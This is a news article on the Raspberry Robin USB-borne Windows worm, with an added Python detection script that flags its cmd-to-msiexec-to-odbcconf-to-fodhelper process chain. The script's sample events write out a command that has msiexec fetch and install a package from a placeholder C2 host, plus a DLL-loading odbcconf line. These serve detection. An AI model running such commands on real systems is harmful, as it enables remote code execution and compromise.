A Windows malware spotted infecting networks across various sectors

July 6, 2022

A sophisticated Windows malware named Raspberry Robin has been detected on hundreds of networks belonging to companies worldwide. First identified in September 2021, the malware spreads through infected USB drives.

While the experts said the malware was found across different sectors, the campaign hit technology and manufacturing companies hardest. According to Microsoft’s report, the malware was observed connecting to Tor network addresses; however, its operators have not yet been observed exploiting that access, for example by bypassing Windows User Account Control, to escalate their attacks.

The infected USB devices contain a malicious [.]LNK shortcut file, which is what starts the Raspberry Robin infection chain.

If a user clicks the malicious shortcut on the compromised flash drive, cmd[.]exe is used to launch an msiexec process, which fetches and runs the malware on the victim’s computer. Once on a machine, Raspberry Robin communicates with its remote C2 server and begins deploying additional payloads through legitimate Windows tools such as msiexec, fodhelper, and odbcconf.

Contrary to the old belief that msiexec[.]exe is a virus, it is a legitimate Windows Installer component that downloads and launches installer packages. However, threat actors also abuse the tool to deliver malware and other malicious payloads to their victims’ machines.

According to the security researchers, Raspberry Robin uses msiexec[.]exe to reach out to a malicious domain that serves as its external command-and-control (C2) server. The researchers added that no specific group has yet been linked to Raspberry Robin, and that they are still working to identify the unknown adversaries’ objectives against their victims.
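The process chain described above (a .LNK shortcut starting cmd.exe, which hands off to msiexec to pull a package from a remote domain, followed by odbcconf and fodhelper) is what a defender would hunt for in process-creation telemetry. The following is an added example written for this article, not code from the page, from Microsoft, or from the researchers: it runs simple rules over a constructed, simplified set of Sysmon-style process-creation events. The hostnames, PIDs, file paths and the `c2.example.invalid` domain are placeholders, and the fodhelper parent-process heuristic is an assumption to be tuned per environment.

```python
import re
from typing import Dict, List, Tuple

Event = Dict[str, str]

# Constructed sample of process-creation events in a simplified Sysmon Event ID 1 shape.
# PIDs, paths and the domain are placeholders for illustration, not indicators from the report.
SAMPLE_EVENTS: List[Event] = [
    {"pid": "1001", "ppid": "900", "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    # Stage 1: the .LNK on the USB drive runs cmd.exe, which hands off to msiexec with a remote URL.
    {"pid": "1002", "ppid": "1001", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'cmd.exe /R msiexec /q /i "http://c2.example.invalid:8080/abc/abc"'},
    {"pid": "1003", "ppid": "1002", "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": 'msiexec /q /i "http://c2.example.invalid:8080/abc/abc"'},
    # Stage 2: odbcconf loads the dropped DLL, then fodhelper is launched from that chain.
    {"pid": "1004", "ppid": "1003", "image": r"C:\Windows\System32\odbcconf.exe",
     "cmdline": r"odbcconf /a {REGSVR C:\ProgramData\stage2.dll}"},
    {"pid": "1005", "ppid": "1004", "image": r"C:\Windows\System32\fodhelper.exe",
     "cmdline": "fodhelper.exe"},
    # Benign control: an admin installs a local package from Explorer; no finding expected.
    {"pid": "1006", "ppid": "1001", "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'msiexec /i "C:\Installers\7z2201-x64.msi" /qn'},
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
# odbcconf loading code: the {REGSVR ...} action or a response file passed with -f / /f.
ODBCCONF_LOAD_RE = re.compile(r"regsvr|(^|\s)[-/]f(\s|$)", re.IGNORECASE)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(ev: Event, by_pid: Dict[str, Event], depth: int = 8) -> List[str]:
    """Image basenames of the process's ancestors, nearest parent first."""
    chain: List[str] = []
    cur = by_pid.get(ev["ppid"])
    while cur is not None and len(chain) < depth:
        chain.append(basename(cur["image"]))
        cur = by_pid.get(cur["ppid"])
    return chain


def check_event(ev: Event, by_pid: Dict[str, Event]) -> List[Tuple[str, str]]:
    """Return (rule_name, reason) hits for one event; an empty list means no finding."""
    hits: List[Tuple[str, str]] = []
    image = basename(ev["image"])
    parents = ancestry(ev, by_pid)
    parent = parents[0] if parents else "<unknown>"
    cmd = ev["cmdline"]

    # msiexec installing a package straight from a URL is the remote-fetch step in the chain.
    if image == "msiexec.exe" and URL_RE.search(cmd):
        hits.append(("msiexec_remote_package", f"msiexec installing from a URL, parent={parent}"))
        if parent == "cmd.exe":
            hits.append(("msiexec_via_cmd", "msiexec launched through cmd.exe, matches the .LNK handoff"))

    # odbcconf being used to register/load a DLL rather than configure a data source.
    if image == "odbcconf.exe" and ODBCCONF_LOAD_RE.search(cmd):
        hits.append(("odbcconf_dll_load", "odbcconf used to register/load a DLL"))

    # Heuristic (assumption): fodhelper is normally launched interactively from the shell,
    # so a different parent is worth a look. Tune the allowed parents per environment.
    if image == "fodhelper.exe" and parent != "explorer.exe":
        hits.append(("fodhelper_unusual_parent", f"fodhelper.exe spawned by {parent}"))

    # Any finding whose tree traces back to msiexec.exe is tied to the stage-1 install.
    if hits and "msiexec.exe" in parents:
        hits.append(("descends_from_msiexec", "process tree traces back to msiexec.exe"))
    return hits


def scan(events: List[Event]) -> Dict[str, List[str]]:
    """Map each flagged PID to the names of the rules it triggered."""
    by_pid = {e["pid"]: e for e in events}
    findings: Dict[str, List[str]] = {}
    for ev in events:
        hits = check_event(ev, by_pid)
        if hits:
            findings[ev["pid"]] = [name for name, _ in hits]
    return findings


if __name__ == "__main__":
    for pid, rules in scan(SAMPLE_EVENTS).items():
        print(pid, rules)
```

The benign local install (PID 1006) produces no finding, while the three stage processes are each flagged on their own behaviour and, for odbcconf and fodhelper, additionally on the fact that their process tree leads back to the msiexec install. Walking the tree rather than matching one event is what separates this chain from an administrator who happens to run msiexec from a command prompt.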

Nonetheless, Microsoft has tagged the campaign as high-risk, since the operators are able to download and launch further malicious payloads on the targeted networks and could elevate their privileges whenever they need to.
